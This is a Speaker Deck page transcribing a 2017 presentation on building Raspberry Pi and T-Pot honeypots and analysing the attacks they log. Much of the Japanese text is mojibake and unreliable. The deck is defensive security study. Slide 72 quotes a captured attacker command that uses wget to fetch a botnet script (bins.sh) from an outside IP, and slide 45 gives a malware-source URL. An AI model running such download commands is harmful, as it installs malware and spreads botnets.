Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
honey-pot with respberry-pi and T-Pot
Search
kobad
May 28, 2017
Technology
0
150
honey-pot with respberry-pi and T-Pot
honey-pot with respberry-pi and T-Pot
kobad
May 28, 2017
Tweet
Share
Other Decks in Technology
See All in Technology
プロデザ! BY リクルート vol.18_リクルートのリサーチ実践組織「リサーチブーストコミュニティ」
recruitengineers
PRO
3
240
Autonomous Database Cloud 技術詳細 / adb-s_technical_detail_jp
oracle4engineer
PRO
14
35k
WebアプリケーションにおけるPDOの使い方入門 / phpcon odawara 2024
meihei3
2
440
テストプロセスで大事にしていること #jasstnano
makky_tyuyan
0
140
オーナーシップを持つ領域を明確にする
konifar
12
2.8k
VS CodeでAWSを操作しよう
smt7174
4
350
Aurora MySQL v3(MySQL8.0互換)の オンラインDDLの罠挙動を全バージョンで検証した
yutakikai
1
150
Four keys改善の取り組み事例紹介
sansantech
PRO
3
230
検証を通して見えてきたTiDBの性能特性
lycorptech_jp
PRO
6
3.5k
「共通基盤」を超えよ! 今、Platform Engineeringに取り組むべき理由
jacopen
25
5.9k
Java EE/Jakarta EEの現状と将来―クラウドネイティブ時代にJava EEは対応できるのか?―
takakiyo
1
100
ここが嬉しいABAC ここが辛いよABAC #再解説+補足編
masahirokawahara
1
240
Featured
See All Featured
Unsuck your backbone
ammeep
662
57k
Pencils Down: Stop Designing & Start Developing
hursman
117
11k
What’s in a name? Adding method to the madness
productmarketing
PRO
15
2.6k
What's new in Ruby 2.0
geeforr
337
31k
Agile that works and the tools we love
rasmusluckow
324
20k
Easily Structure & Communicate Ideas using Wireframe
afnizarnur
186
16k
Infographics Made Easy
chrislema
237
18k
The Straight Up "How To Draw Better" Workshop
denniskardys
227
130k
The Power of CSS Pseudo Elements
geoffreycrofte
59
5k
5 minutes of I Can Smell Your CMS
philhawksworth
199
19k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
1
3.4k
Why You Should Never Use an ORM
jnunemaker
PRO
50
8.6k
Transcript
ROAD TO HONEY-POTTER ϋχʔϙολʔͷಓ 1
HONEY POTTER ࣍ ▸ ϋχʔϙοτͱ ▸ honeeepi ▸ t-pot ▸
Summary 2
HONEY POTTER ඪ GOAL ▸ ݟश͍ϋχʔϙολʔʹͳΔ (Become a beginner honey
potter) ▸ ߈ܸ͞ΕͯΔ͜ͱΛΔ (Know that we are attacked) ▸ ϋχʔϙοτͷߏஙͱղੳํ๏ΛΔ (How to construct and analyze) 3
HONEY POTTER ղੳʹ͍ͭͯ ▸ ϩάղੳܦݧ͕େࣄʢΒ͍͠ʣ(Experience is important for log analysis)
▸ ࣗݟश͍ͳͷͰશһ͕πʔϧΛͬͯͰ͖Δͱ͜Ζ·Ͱ ͬͯݟΔ (I analyze it by using tools) 4
THE HONEYNET PROJECT ▸ ࠃࡍతͳϓϩδΣΫτ( https://www.honeynet.org/ ) ▸ ϋχʔϙοτͷOSS։ൃ (Developer
of OSS for honeypot) ▸ ߈ܸใɺϚϧΣΞͷڞ༗ͳͲ 5
ϋχʔϙοτͱ ϋχʔϙοτͱ ▸ ϋχʔϙοτ͓ͱΓͷͨΊʹઃஔ͢ΔͷͰਖ਼نͷ௨৴͕ൃ ੜ͠ͳ͍ͱ͍͏ಛ͕͋Δɻ͜ΕɺهʹΔΞΫηε ͯ͢ෆਖ਼ΞΫηεͱͳΔͷͰɺޡݕΛݮΒ͠ݕӮΕΛ ͳ͘͢͜ͱ͕Ͱ͖Δɻ ϋχʔϙοτͷతͱͯ͠ɺΠϧ εϫʔϜͷݕମͷೖखɺෆਖ਼ΞΫηεΛߦ͏ΫϥοΧʔΛ ͓ͼ͖دͤॏཁͳγεςϜ͔Β߈ܸΛͦΒͨ͠Γɺه͞Ε
ͨૢ࡞ϩάɾ௨৴ϩάͳͲ͔Βෆਖ਼ΞΫηεͷख๏ͱͷ ௐࠪΛߦ͏ͳͲڍ͛ΒΕΔɻ(WikipediaΑΓ) 6
ϋχʔϙοτͱ ϋχʔϙοτͱ ▸ ϚϧΣΞݕମͷೖख (Get a malware) ▸ ϩάΛऩूɾղੳΛͯ͠߈ܸख๏ɾͷௐࠪ (Research
attack technique and tendency) ߈ܸ ϩάղੳ 7
ϋχʔϙοτͱ ϋχʔϙοτͱ ▸ ߈ܸΛͦΒ͢ ߈ܸ 8
ϋχʔϙοτͱ ϋχʔϙοτͷछྨ ▸ ߴରܕ (high-interaction) ▸ ੬ऑੑΛͨ͠ຊͷOS, ΞϓϦέʔγϣϯ (All Real
OS, Application) ▸ ରܕ(low-interaction) ▸ ಛఆͷOS, ΞϓϦέʔγϣϯΛ฿ (Specific OS, Application) 9
ϋχʔϙοτͱ ϋχʔϙοτͷछྨ ▸ Server ܕ ▸ ߈ܸΛͪड͚Δ ▸ Client ܕ
▸ ෆ৹ͳαʔόΞΫηε͠ʹߦ͘ 10
ϋχʔϙοτͱ ͋ΒΏΔαʔϏεΛ฿ ▸ Database type ▸ Mongo-DB HoneyProxy ▸ Web
type ▸ Glastopf, Dionaea ▸ SSH type ▸ Kippo, Cowrie ▸ Malware Collector, etc… ▸ Ϧετ- https://github.com/paralax/awesome-honeypots 11
HONEY POT ӡ༻্ͷҙ ▸ honeypotࣗମ͕੬ऑͳ͜ͱ͋Δ ▸ ౿Έʹ͞ΕͨΓɺٯʹѱ༻͞ΕΔՄೳੑ͕͋Δ ▸ దͳઃఆ͕ඞཁɻhoneypot͔Β֎ͷ௨৴Λ੍ݶ͢Δͳ Ͳ
12
RASPIͰ ϋχʔϙοτ! 13
RASPIͰ؆୯ϋχʔϙοτ! HONEEEPI ▸ wiki - https://redmine.honeynet.org/projects/honeeepi/ wiki ▸ raspbian Λϋχʔϙοτ༻ʹΧελϚΠζͨ͠OS
▸ Conpot, Dionaea, Glastopf, Kippo, Cowrie 14
HONEEEPI CONPOT ▸ http://conpot.org/ ▸ ICS/SCADA Honeypot ▸ ࢈ۀ੍ޚγεςϜ(γεςϜࢹɺϓϩηε੍ޚΛ͢Δ)Λ ฿
15
HONEEEPI DIONAEA ▸ https://github.com/gento/dionaea ▸ ϋΤτϦάα - Dionaea muscipula ▸
ෳͷWebΞϓϦέʔγϣϯΛӡ༻(multiple applications) ▸ FTP, TFTP, HTTP, HTTPS, MSB, SIP, MSSQL, MySQL 16
HONEEEPI GLASTOPF ▸ http://mushmush.org/ ▸ WebʹಛԽͨ͠ϋχʔϙοτ(specialization in web) ▸ WebΞϓϦέʔγϣϯαʔόͱͯ͠ಈ͖ɺ80൪ϙʔτͰ
ͪड͚ͯͦ͜ʹର͢Δ߈ܸΛݟΔ 17
HONEEEPI KIPPO ▸ https://github.com/desaster/kippo ▸ SSH honeypot ▸ ͲΜͳํ๏Ͱଓͯ͘͠Δ͔ ▸
ϩάΠϯ͞Εͨ͋ͱԿΛͯ͘͠Δ͔ ▸ ରࡦ͕͞Ε͖ͯͯΔ 18
HONEEEPI COWRIE ▸ https://github.com/micheloosterhof/cowrie ▸ SSH Honeypot ▸ Kippoͷվྑ൛ 19
HONEEEPI HONEEEPIͷߏங ▸ http://qiita.com/junk_coken/items/ 5ba04bf2381b3e51d621 ▸ https://redmine.honeynet.org/projects/honeeepi/wiki 20
ߏஙํ๏هࣄΛݟ ΕΘ͔ΔͷͰɺɺ 21
HONEEEPI ߏங࣌ؾΛ͚ͭΔ͜ͱ ▸ SSHઃఆ (Setting of ssh) ▸ ϩάग़ྗઃఆ (Setting
of log output) ▸ ݕճආ(Dionaea) (Detective evasion) 22
HONEEEPI SSHઃఆ ▸ ϙʔτมߋ( 22 → ?????) (Change port number)
▸ RSAೝূ (RSA Authentication) ▸ ύεϫʔυೝূOFF 23
HONEEEPI ϩάग़ྗઃఆ ▸ શͯͷϩάΛه͢Δͱଟ͗͢Δ ▸ ඞཁͳϩάͷΈग़ྗ͢ΔΑ͏ʹઃఆ(honeypot͝ͱʹઃఆํ ๏ҟͳΔ) (Output only important
logs) 24
HONEEEPI ݕճආ(DIONAEA) ▸ nmap Ͱϋχʔϙοτ͕ݕ͞ΕΔ߹͕͋Δ ▸ ͜ͷ··ͩͱόϨͯ߈ܸ͞Εͳ͍ 25
HONEEEPI ݕճආ(DIONAEA) ▸ nmapͷγάωνϟΛݟΔͱͲ͜Ͱݕͯ͠Δ͔Θ͔Δ (https://svn.nmap.org/nmap/nmap-service-probes) 26
HONEEEPI ݕճආ(DIONAEA) ▸ FTP - ϨεϙϯεϝοηʔδͰఆ ▸ Welcome to the
ftp service ͱൺֱ ▸ ϨεϙϯεϝοηʔδΛม͑Εྑ͍ 27
HONEEEPI ݕճආ(DIONAEA) ▸ HTTP - σϑΥϧτͷϨεϙϯεΛݕ ▸ webrootʹԿ͔͠ΒϑΝΠϧΛஔ͚ྑ͍ ▸ /opt/dionaea/var/dionaea/wwwroot
ʹindex.htmlΛ͓͘ 28
HONEEEPI ݕճආ(DIONAEA) ▸ MSSQL - pre-login TDS package (Tabular Data
Streams)ͷ ใΛνΣοΫ͍ͯ͠Δ ▸ tokenTypeΛॻ͖͑Δ ▸ /opt/dionaea/lib/dionaea/python/dionaea/mssql/mssql.py 29
ՄࢹԽ VISUALIZATION 30
HONEEEPI DIONAEAFR ▸ ϩάՄࢹԽπʔϧ ▸ Service, IP, Port, URL, Malware,
Country 31
HONEEEPI ҙ ▸ ϥζύΠʹDionaeaFRೖΕΔͷεϖοΫతʹਏ͍ ▸ ผͷԾϚγϯͳͲʹϩάϑΝΠϧ͚ͩͯ͠ݟ·͠ΐ͏ 32
HONEEEPI SERVICE 33
HONEEEPI MALWARE ▸ ઃஔ͞ΕͨόΠφϦϋογϡΛVirusTotalͰݕࡧͨ͠ ▸ VirusTotalͱͷ࿈ܞ͕ඞཁ 34
HONEEEPI COUNTRY ▸ Ҏ্தࠃ (China more than half) 35
HONEEEPI IP 36
HONEEEPI IP 37
HONEEEPI AUGSE ͰௐΔ ▸ https://www.aguse.jp/ ▸ ௐ͍ࠪͨ͠αΠτͷURLड৴ͨ͠ϝʔϧͷϝʔϧϔομʔ Λೖྗ͢Δ͜ͱʹΑΓɺؔ࿈͢ΔใΛදࣔ͢ΔαʔϏε (ެ͔ࣜΒҾ༻) ▸
҆શʹո͍͠αΠτɺϝʔϧΛௐΒΕΔ (Research unreliable site or mail) 38
39
40
HONEEEPI BARRACUDA CENTRALͷใΛݟʹߦ͘ ▸ ϒϥοΫϦετೖΓͯ͠Δཧ༝͕هࡌ͞Ε͍ͯΔ ▸ poor - ৄ͍͠ཧ༝ແ͘ɺෆྑΒ͍͠ 41
HONEEEPI 123.207.23.254 ▸ ҟৗʹΞΫηε͕ଟ͍ (a lot of access) ▸ ͜Ε͔Βಈ͖͕͋Δ͔
▸ ࠓޙผͷϒϥοΫϦετʹೖΔՄೳੑ͋ΔͷͰɺఆظతʹ νΣοΫ͢Δ (It may go in blacklist in the future) 42
HONEEEPI ଞͷIPௐͯݟΔ(ANOTHER IP) ▸ 167.160.182.27 - ϑϩϦμ, ϒϥοΫϦετͳ͠ ▸ 115.182.95.66
- தࠃ, ϒϥοΫϦετͳ͠ ▸ 36.111.34.139 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 123.57.255.171 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 211.149.200.156 -115.182.95.66 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 220.174.150.90 - தࠃ, ϒϥοΫϦετͳ͠ ▸ 61.133.116.18 - தࠃ(Shandong Liaocheng), ϒϥοΫϦετ3Օॴ 43
HONEEEPI 61.133.116.18 ▸ barracuda central, ▸ the spamhaus project ▸
CBL ▸ ͷ̏ͭͷϒϥοΫϦετೖΓ 44
61.133.116.18 CBLͷใΛݟͯΈͨ ▸ http://www.abuseat.org/lookup.cgi ▸ ͔͜͜ΒτϩΠͷഅɺϥϯαϜΣΞɺϘοτωοτͱͳ ΔΠϧε͕ײછΛड͚͍ͯͨ (Trojan horse, Ransomware,
Botnet) ▸ h ttp ://n. hm ibl go j a.ru/ ͕ײછݯͷՄೳੑ͕͋Δ(ଓ͠ ͳ͍Ͱ͍ͩ͘͞) ▸ virustotal ͰௐͯϚϧΣΞ͕ݕग़͞Εͨ 45
T-POT 46
T-POT T-POT ▸ http://dtag-dev-sec.github.io/mediator/feature/2016/03/11/t- pot-16.03.html ▸ ϋχʔϙοτͷηοτΞοϓɺϩάཧɺՄࢹԽπʔϧͷηο τΞοϓ·ͰࣗಈͰͬͯ͘ΕΔϓϥοτϑΥʔϜ ▸ Conpot,
Cowrie, Dionaea, Elasticpot, eMobility, Glastopf, Honeytrap ▸ suricata, ELK Stack ▸ ࠷ͰɺϝϞϦ4GB, 64GBσΟεΫ༰ྔඞཁ 47
T-POT ARCHITECTURE 48
T-POT PORT ߏ 49
T-POT INSTALLATION ▸ iso image࡞Δ ▸ ىಈ͢Δ͚ͩͰ͋ͱͷηοτΞοϓࣗಈͰͯ͘͠ΕΔ (auto setup) 50
T-POT CONPOT ▸ http://conpot.org/ ▸ ICS/SCADA Honeypot ▸ ࢈ۀ੍ޚγεςϜ(γεςϜࢹɺϓϩηε੍ޚΛ͢Δ)ͷ ฿
51
T-POT DIONAEA ▸ https://github.com/gento/dionaea ▸ ϋΤτϦάα - Dionaea muscipula ▸
ෳͷWebΞϓϦέʔγϣϯΛӡ༻ ▸ FTP, TFTP, HTTP, HTTPS, MSB, SIP, MSSQL, MySQL 52
T-POT COWRIE ▸ https://github.com/micheloosterhof/cowrie ▸ SSH Honeypot ▸ Kippoͷվྑ൛ 53
T-POT GLASTOPF ▸ http://mushmush.org/ ▸ WebʹಛԽͨ͠ϋχʔϙοτ ▸ WebΞϓϦέʔγϣϯαʔόͱͯ͠ಈ͖ɺ80൪ϙʔτͰ ͪड͚ͯͦ͜ʹର͢Δ߈ܸΛݟΔ 54
T-POT ELASTICPOT ▸ https://hub.docker.com/r/honeynet/elasticpot/ ▸ elastic search Λͨ͠ϋχʔϙοτ 55
T-POT EMOBILITY ▸ https://github.com/dtag-dev-sec/emobility ▸ Πϯϑϥʹର͢Δ߈ܸσʔλΛऩू? (Attack for infrastructure ?)
56
T-POT HONEYTRAP ▸ ωοτϫʔΫαʔϏεͷ߈ܸΛ؍ଌ (Attack for network services) ▸ ෳͷωοτϫʔΫαʔϏεͷΤϛϡϨʔγϣϯ
▸ ॳظ߈ܸΛݕ 57
T-POT SURICATE ▸ http://suricata-ids.org/features/ ▸ ΦʔϓϯιʔεͷIDS/IPS (৵ೖݕγεςϜ) 58
T-POT ELK-STACK ▸ Elasticksearch ▸ Logstash ▸ Kibana Ͱ͍͍ײ͡ʹϩάΛՄࢹԽͯ͘͠ΕΔ (Visualization)
59
T-POT ACCESS COUNT 60
T-POT OS, SERVICE, COUNTRIES, USERNAME, PASSWORD, HISTOGRAM 61
T-POT COUNTRIES 62
T-POT IP, ASN, SURICATA ALERT 63
T-POT DOCKER 64
T-POT SYSTEM 65
T-POT LOG 66
T-POT LOG (HONEY TRAP) 67
T-POT LOG (HONEY TRAP) 68
69
T-POT ةݥͰͳ͍Β͍͠ ▸ Windows͔ΒͷΞΫηε࣌ʹൃੜ͢Δʁ ▸ ૹΒΕ͖ͯͨσʔλͷαΠζɺϋογϡΛग़ͯ͘͠ΕΔ ͷͰ͙͢VirusTotalͳͲͰௐΒΕΔ 70
T-POT LOG 71
T-POT LOG ▸ wget http:// 185.73.147. 5/ bins.sh ▸ bins.sh
ΛDL͠Α͏ͱͯ͠Δ ▸ IP෦͕ҧ͏ύλʔϯଟ͘ݟ͚ͭΒΕͨ 72
ϋογϡΛ ௐΔͱɻɻɻ 73
T-POT VIRUSTOTAL 74
T-POT BINS.SH ▸ τϩΠͷഅ ▸ ଟͷIP͔ΒDL͠Α͏ͱͯ͠ΔͷͰɺେ͖ͳϘοτωοτ ͕͢Ͱʹܗ͞ΕͯΔ ▸ μϯϩʔυ͞ΕͨϑΝΠϧ /data/cowrie/downloads/
ʹอଘ͞Εɺ߈ܸऀΞΫηεͰ͖ͳ͍ 75
T-POT BINS.SH ▸ ֎෦͔Βૢ࡞Ͱ͖ΔΑ͏ʹඞཁͳίϚϯυͷΠϯεʔϧ ▸ ࣮ߦ → আ ▸ ͜ΕΛ܁Γฦͯ͠ײછΛ͛ͯΔ
76
185.73.147.5 ΛAGUSE ͰௐΔͱɻɻɻ 77
78
T-POT SPAMHAUS ▸ https://www.spamhaus.org/ 79
IoT 80
T-POT T-POT ▸ isoΠϝʔδ̍ͭͰ؆୯ʹηοτΞοϓͯ͘͠ΕΔ ▸ ELKͰײతʹ͍ͭͲ͔͜ΒͲΜͳΞΫηε͕དྷͯΔ͔Θ͔ Δ 81
SUMMARY 82
HONEY POT 1ϲ݄؍ͯ͠ݟͯ ▸ ৗʹ߈ܸ͞ΕͯΔ ▸ αʔϏεΛ༷ʑͳ(੬ऑͳ)όʔδϣϯʹม͑ͯ߈ܸͯ͘͠Δ ▸ Cowrieʹରͯ͠όοΫυΞΛֻ͚ΔΑ͏ͳ߈ܸ͕ଟ͔ͬ ͨ
(Attack for set a back door) ▸ bins.shͷDL 83
HONEY POT SUMMARY ▸ ϋχʔϙοτ؆୯ʹߏஙͰ͖Δ (Creating honeypot is easy) ▸
ຖຖඵ߈ܸΛड͚ͯΔʂ(We are attacked everyday) ▸ ՄࢹԽͱπʔϧͷ͓͔͛ͰͳΜͱແ͘ղੳͬΆ͍͜ͱ͕Ͱ͖ ͨ 84
HONEY POT ࢀߟɾҾ༻ ▸ http://www.morihi-soc.net/ ▸ http://qiita.com/junk_coken/items/ 5ba04bf2381b3e51d621 ▸ http://blog.takanabe.tokyo/2015/04/24/293/
▸ https://www.securityartwork.es/2014/06/05/avoiding- dionaea-service-identification/ 85
THANK YOU FOR LISTENING 86